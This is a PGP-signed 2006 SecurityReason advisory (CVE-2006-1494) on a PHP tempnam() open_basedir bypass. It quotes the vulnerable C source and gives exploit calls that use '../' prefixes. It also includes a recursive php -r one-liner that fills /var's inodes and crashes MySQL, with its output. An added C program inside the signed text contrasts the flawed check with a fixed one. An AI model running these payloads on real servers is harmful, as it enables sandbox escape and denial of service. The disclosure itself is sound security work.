Details : SecurityReason Advisory
Topic : tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2
SecurityAlert : 36
CVE : CVE-2006-1494
SecurityRisk : Medium
Remote Exploit : No
Local Exploit : Yes
Exploit Given : Yes
Credit : Maksymilian Arciemowicz
Date : 08.04.2006
Affected Software : PHP 4.4.2 and prior; PHP 5.1.2 and prior
Advisory Text :

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
-Written: 26.3.2006
-Public: 8.4.2006
from SECURITYREASON.COM
CVE-2006-1494

--- 0. Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed
from C, Java and Perl with a couple of unique PHP-specific features thrown
in. The goal of the language is to allow web developers to write
dynamically generated pages quickly.
A nice introduction to PHP by Stig Sæther Bakken can be found at
http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of
the PHP Conference Material is freely available.
tempnam -- Create file with unique file name
--- 1. tempnam() open_basedir bypass ---
The function tempnam() takes two arguments:
http://pl.php.net/manual/en/function.tempnam.php
string tempnam ( string dir, string prefix )
So, if open_basedir is set to /home, we should not be able to create a file outside
the /home directory.
In ext/standard/file.c (PHP 4.4.2):
--- lines 550-578 ---
PHP_FUNCTION(tempnam)
{
    pval **arg1, **arg2;
    char *d;
    char *opened_path;
    char p[64];
    FILE *fp;

    if (ZEND_NUM_ARGS() != 2 || zend_get_parameters_ex(2, &arg1, &arg2) == FAILURE) {
        WRONG_PARAM_COUNT;
    }
    convert_to_string_ex(arg1);
    convert_to_string_ex(arg2);
    if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) {
        RETURN_FALSE;
    }
    d = estrndup(Z_STRVAL_PP(arg1), Z_STRLEN_PP(arg1));
    strlcpy(p, Z_STRVAL_PP(arg2), sizeof(p));
    if ((fp = php_open_temporary_file(d, p, &opened_path TSRMLS_CC))) {
        fclose(fp);
        RETVAL_STRING(opened_path, 0);
    } else {
        RETVAL_FALSE;
    }
    efree(d);
}
--- lines 550-578 ---
The open_basedir check is applied only to arg1, the directory:

    if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) {
        RETURN_FALSE;
    }

Where is arg2? The prefix is never checked; it is copied into p and handed straight
to php_open_temporary_file() as the start of the file name. A prefix containing
"../" sequences therefore walks out of the allowed directory, so an exploit can
be written like:
tempnam("path_from_open_basedir", "../../../../../../../../Open_basedir_bypasswd");
tempnam("/home", "../../../../../../tmp/cx");
etc.
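The C program below is an added illustration, not code from the advisory or from PHP. It rebuilds, outside PHP, the path tempnam() ends up creating (assumed here to be "<dir>/<prefix>XXXXXX", the template php_open_temporary_file() constructs) and contrasts the 4.4.2 check, which only looks at the dir argument, with a check on the resolved final path, which is what closes the gap. The function names and the lexical resolver are this example's own; the resolver handles "." and ".." only and ignores symlinks, which a real implementation would canonicalise with realpath() afterwards.

```c
#include <stdio.h>
#include <string.h>

#define PATH_BUF 256

/* Added example; not code from PHP or from the advisory. The template
 * shape "<dir>/<prefix>XXXXXX" is an assumption about what
 * php_open_temporary_file() builds from tempnam()'s two arguments. */

/* Build the template handed to the temp-file routine. 0 on success. */
int build_template(const char *dir, const char *prefix, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "%s/%sXXXXXX", dir, prefix);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Resolve "." and ".." in an absolute path lexically. ".." at the root
 * stays at the root, as the kernel does. 0 on success, -1 if the input
 * is not absolute or does not fit in out. */
int lexical_resolve(const char *path, char *out, size_t outlen)
{
    if (path[0] != '/' || outlen < 2)
        return -1;
    size_t len = 1;                 /* out always holds at least "/" */
    out[0] = '/';
    out[1] = '\0';

    const char *p = path;
    while (*p) {
        while (*p == '/')           /* skip one or more separators */
            p++;
        if (!*p)
            break;
        const char *seg = p;
        while (*p && *p != '/')
            p++;
        size_t seglen = (size_t)(p - seg);

        if (seglen == 1 && seg[0] == '.')
            continue;
        if (seglen == 2 && seg[0] == '.' && seg[1] == '.') {
            if (len > 1) {          /* pop the last component */
                char *slash = strrchr(out, '/');
                len = (slash == out) ? 1 : (size_t)(slash - out);
                out[len] = '\0';
            }
            continue;
        }
        size_t need = (len > 1 ? 1 : 0) + seglen;   /* separator + segment */
        if (len + need + 1 > outlen)
            return -1;
        if (len > 1)
            out[len++] = '/';
        memcpy(out + len, seg, seglen);
        len += seglen;
        out[len] = '\0';
    }
    return 0;
}

/* 1 if path equals basedir or lies below it, compared component-wise so
 * that "/homer" does not pass for "/home". basedir has no trailing slash. */
int path_within(const char *basedir, const char *path)
{
    size_t blen = strlen(basedir);
    if (blen == 1 && basedir[0] == '/')
        return path[0] == '/';
    return strncmp(path, basedir, blen) == 0
        && (path[blen] == '/' || path[blen] == '\0');
}

/* What PHP 4.4.2 does: only dir is tested; prefix is never consulted. */
int dir_only_check(const char *basedir, const char *dir, const char *prefix)
{
    char resolved[PATH_BUF];
    (void)prefix;
    if (lexical_resolve(dir, resolved, sizeof resolved) != 0)
        return 0;
    return path_within(basedir, resolved);
}

/* The check that closes the gap: test the path the file will actually be
 * created at, i.e. dir and prefix combined and then resolved. */
int resolved_path_check(const char *basedir, const char *dir, const char *prefix)
{
    char tmpl[PATH_BUF], resolved[PATH_BUF];
    if (build_template(dir, prefix, tmpl, sizeof tmpl) != 0)
        return 0;
    if (lexical_resolve(tmpl, resolved, sizeof resolved) != 0)
        return 0;
    return path_within(basedir, resolved);
}

int main(void)
{
    const char *basedir = "/home";
    /* constructed inputs: a legitimate call and the advisory's payload */
    const char *cases[][2] = {
        { "/home", "cx" },
        { "/home", "../../../../../../tmp/cx" },
    };
    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++) {
        char tmpl[PATH_BUF], resolved[PATH_BUF];
        build_template(cases[i][0], cases[i][1], tmpl, sizeof tmpl);
        lexical_resolve(tmpl, resolved, sizeof resolved);
        printf("%-38s -> %-14s dir-only: %s  resolved-path: %s\n", tmpl, resolved,
               dir_only_check(basedir, cases[i][0], cases[i][1]) ? "pass" : "deny",
               resolved_path_check(basedir, cases[i][0], cases[i][1]) ? "pass" : "deny");
    }
    return 0;
}
```

Run as-is, the program shows the legitimate call passing both checks while the advisory's payload passes the dir-only check and is denied once the combined path is resolved; the same combined-path test is the property a patched tempnam() has to guarantee, whether by stripping directory components from the prefix or by checking the final path.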
It is a low-severity issue, but you can create a lot of files and exhaust the
inodes of the filesystem. I have one partition:
/var /dev/ad0s1e 1.0G 97M 858M 10% /var <- Space (B)
/dev/ad0s1e 1012974 94472 837466 10% 3796 137514 3% /var <- INODES
where mysql and apache create their files. When the free inodes are exhausted,
the system has big problems with apache and mysql.
Example:
cxib# php -r 'function cx(){ tempnam("/www/",
"../../../../../../var/tmp/cx"); cx(); } cx();'
/var: create/symlink failed, no inodes free
/var: create/symlink failed, no inodes free
/var: create/symlink failed, no inodes free
/var: create/symlink failed, no inodes free
... etc
/usr/local/libexec/mysqld: Can't create/write to file '/var/tmp/ibBIsZ6o'
(Errcode: 13)
And mysql die()!
--- 2. How to fix ---
See the PHP CVS NEWS file:
http://cvs.php.net/viewcvs.cgi/php-src/NEWS
--- 3. Greets ---
For: sp3x
and
p_e_a, pi3, eax, Infospec ;]
--- 4. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (FreeBSD)
iD8DBQFEOAZB3Ke13X/fTO4RAiDmAKCbBZP8JBC0F/9cB5OgUFJPgqHB4QCgon9L
kBEMIExP2TZ0+NP7l5uk9TE=
=f3i4
-----END PGP SIGNATURE-----